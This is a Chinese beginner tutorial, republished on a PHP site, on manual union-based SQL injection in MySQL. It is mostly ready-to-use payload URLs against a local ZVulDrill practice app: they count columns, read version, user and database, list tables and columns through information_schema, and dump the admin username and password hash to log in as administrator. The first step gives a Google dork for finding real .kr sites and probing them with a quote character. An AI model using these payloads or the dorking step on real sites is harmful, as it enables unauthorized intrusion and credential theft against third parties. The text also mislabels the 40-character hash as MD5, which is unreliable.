Home  >  Article  >  Database  >  手动sql注入(初级篇)_MySQL

手动sql注入(初级篇)_MySQL

WBOY
WBOYOriginal
2016-06-01 13:06:361689browse

我也是才学 sql 注入一个星期,此篇文章是学给初学者看的

推荐书籍 《sql注入攻击与防御》http://www.ddooo.com/softdown/50160.htm

1、找到存在sql注入的网站

  方法:在google中输入 site:kr inurl:php?id=    打开出现的网址,在网址后面添加 ’  (英文逗号)如果页面出现跳转 说明可能存在sql注入原理:一般网址都是类似  search.php?search=hello   相应的sql语句 可能是 select * from table_name where column_name='hello'   如果在网址后面添加 ‘   则sql语句为  select * from table_name where column_name='hello'’   如果网站没有进行sql注入过滤,会报错在GitHub有个Web漏洞演练项目,可以下载后部署在自己的电脑上(这里我就不教大家部署了,熟悉Web编程的大部分都会)        https://github.com/710leo/ZVulDrill网页内容如下

2、检测字段长度

(1) http://localhost/ZVulDrill-master/search.php?search=hello%' order by 1--%20相当于sql语句 select * from table_name where colmun_name like '%hello%' order by 1 -- '说明 MySQL有三种注释 -- 是其中一种 但是 -- 后面要跟一个空格才有效 但是网址会自动去掉最后一个空格需要手动输入%20注释后面的sql语句不执行(2)  此时页面没有出错,用同样的方式 添加 order by 10页面出错,然后 order by 5 出错,order by 4 页面正确 说明字段长  4

3、查看数据库信息

      方法:使用union语句提取数据      (1)   http://localhost/ZVulDrill-master/search.php?search=hello%' and 1=2 union select 1,2,2,4 --%20sql语句  select * from table_name where column_name like '%hello%' and 1=2 union select 1,2,3,4union前的sql语句中 where条件恒为假,结果集为空,整个sql语句返回的是union后面的结果集
   (2)  获取MySQL version user database 等相关信息   如上图所示,页面上显示 1,2 ,可以利用这个来显示我们需要的信息 http://localhost/ZVulDrill-master/search.php?search=hello%' and 1=2 union select 1,version(),user(),4 --%20  即  将 2,3 换成 version(),user()  页面如下
同理将 user() 换成 database()  得到数据库名  zvuldrilluser() ------------    wkdty@localhostversion()  --------------   5.6.17 (5.0以上的版本都带有一个 information_schema 的虚拟库里面存放的是所有库的信息.) database()   -------------  zvuldrill

4、获取数据库数据

 (1)获取表名http://localhost/ZVulDrill-master/search.php?search=hello%' and 1=2 union select 1,2,GROUP_CONCAT(DISTINCT table_name),4 from information_schema.columns where table_schema='zvuldrill'--%20
数据库中有3张表,对我们最有用的是admin这张表,以管理员身份进入网站可以看到各种信息(2)获取字段名http://localhost/ZVulDrill-master/search.php?search=hello%' and 1=2 union select 1,2,GROUP_CONCAT(DISTINCT column_name),4 from information_schema.columns where table_name='admin'--%20


(3)获取数据http://localhost/ZVulDrill-master/search.php?search=hello%' and 1=2 union select 1,2,GROUP_CONCAT(DISTINCT admin_id,admin_name,admin_pass),4 from admin--%20

  admin_id 1 admin_name adminadmin_pass d033e22ae348aeb5660fc2140aec35850c4da997   (md5解密之后  得到admin)根据用户登录入口,找到后台登录入口  ,以管理员身份进入网站
Statement:
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn